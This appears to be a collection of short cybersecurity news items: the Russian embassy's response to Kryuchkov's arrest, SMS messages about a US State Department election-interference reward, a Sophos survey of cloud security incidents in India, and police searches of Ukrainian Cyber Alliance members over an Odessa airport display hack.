The Russian Embassy in the United States said that diplomats are aware of Kryuchkov's arrest. "We will contact the Russian in the near future to find out the problem. We will provide him with the necessary consular and legal assistance,” said the diplomatic mission.

The Russians were offered $10 million from the State Department for information about Russian hackers

Residents of Russia began to receive SMS about a way to get $10 million from the US State Department. In the messages, Russians are offered this money for information about the interference of Russian hackers in the American elections.

Such SMS messages are published by residents of different cities in Russia in social networks. Among them the Deputy of the Duma of Yekaterinburg Timofey Zhukov. In the Telegram channel, he published a screenshot of such a message. "The US State Department is offering up to $10 million for information about interference in the US election. If you have information, please contact us,” said the SMS.

The link in the message leads to a verified Twitter account of the US State Department's Rewards for Justice program. According to the hashtag of the same name, Election_Reward, dozens of messages of the Department's program were published on Twitter in different languages of the world, including Russian.

Experts noted that the message was sent to Russians through the program CentrSoobsh — a service that is usually used to send spam or fake SMS in order to hack accounts by fraudsters.

Earlier, US Secretary of State Mike Pompeo announced the start of this program. He promised that Washington will pay the amount for information about persons interfering in the elections. Pompeo mentioned that the program applies to both Russia and other malicious states.

The representative of the Russian Foreign Ministry, Maria Zakharova, considered that if the US really begins to pay everyone up to 10 million dollars for such information, the state Department's website "will break down from denunciations to neighbors."

Senator of the Federation Council Frants Klintsevich called such actions an illusion and provocation, which carry a danger. He added that the messages are sent not by the US, but by emissaries with money.

According to him, it is necessary to find those who send messages, to bring everything to its logical end. Moreover, if necessary, the Russian Federation need s to change the legislation, as such actions are trying to destabilize the situation in the country.

Indian Organizations Suffer the Most in Public Cloud Security Incidents



In a survey of 26 countries for public Cloud security incidents, India emerges as the nation which endured the hardest hits the previous year with 93 percent of the nation's organizations encountering the problem.

The survey included more than 3,500 IT managers across 26 nations in Europe, the Americas, Asia Pacific, the Center East, and Africa that currently host data and workloads at hand in the Public Cloud.

The cybersecurity incidents that Indian organizations suffered most included ransomware (53 percent) and other malware (49 percent), exposed data (49 percent), compromised accounts (48 percent), and cryptojacking (36 percent), said the report titled "The State of Cloud Security 2020" by cybersecurity company Sophos.

While Europeans seem to have endured the least level of security incidents in the Cloud, an indicator that compliance with General Data Protection Regulation (GDPR) guidelines are assisting with protecting organizations from being undermined.

However, India still hasn't enforced a data protection law.

Chester Wisniewski, Principal Research Scientist at Sophos said in a statement, "Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public Cloud."

 "The recent increase in remote working provides extra motivation to disable Cloud infrastructure that is being relied on more than ever, so it's worrisome that many organizations still don't understand their responsibility in securing Cloud data and workloads," Wisniewski added later.

"Cloud security is a shared responsibility, and organizations need to carefully manage and monitor Cloud environments in order to stay one step ahead of determined attackers."

According to the report, more than 55 percent of Indian organizations and businesses revealed that cybercriminals obtained access through the stolen Cloud provider account credentials.

Regardless of this, only 29 percent said managing access to Cloud accounts is a top area of concern. Albeit 'accidental exposure' keeps on plaguing organizations, with misconfigurations exploited in 44 percent of reported attacks on Indian organizations.

With 76 percent of organizations utilizing the Public Cloud, detection and response are driving the Cloud security concern for IT managers in India while data security still stays as a top concern across the world for organizations.

Police found Ukrainian hackers who insulted Greta Thunberg in Odessa


Attackers broke into the terminal of the Odessa airport and scolded the eco-activist.
Law enforcement authorities in Odessa (Ukraine) said that they found the hackers of the Odessa airport information system, who posted pictures with insulting or obscene language on the organization’s scoreboard against eco-activist Greta Thunberg.

According to police, on February 25, officers with the support of the special forces unit of the National Police of Ukraine searched the houses of the participants and founders of the Ukrainian Cyber Alliance public organization. The search was authorized by a decision of the Odessa court. The seized equipment was sent for examination. Law enforcement officers opened a criminal case on the fact of unauthorized interference in the work of the Odessa terminal. The attackers face imprisonment for a term of three to six years.

Ukrainian Cyber Alliance associates such actions of the National Police of Ukraine with political pressure on its activists.

It is worth noting that the Ukrainian Cyber Alliance is a community of Ukrainian cyber-activists that emerged in the spring of 2016 from the Association of two groups of cyber-activists FalconsFlame and Trinity. Later, a group of cyber activists RUH8 and individual cyber-activists of the CyberHunta group joined the Alliance.

The fact of hacking the Odessa airport information system occurred in October last year. At that time, a new terminal was installed in the renovated hall of the Odessa airport. Hackers posted a photo of the Swedish eco-activist with the inscription "F*** you, Greta" on the new terminal.

Recall that Time magazine awarded 16-year-old Swedish eco-activist Greta Thunberg the title of "Person of the Year". She began her fight for ecology in the late summer of 2018. Every Friday, the girl went on a single picket near the walls of the Swedish Parliament with a poster "School strike for climate", and a year later, similar pickets were staged around the world.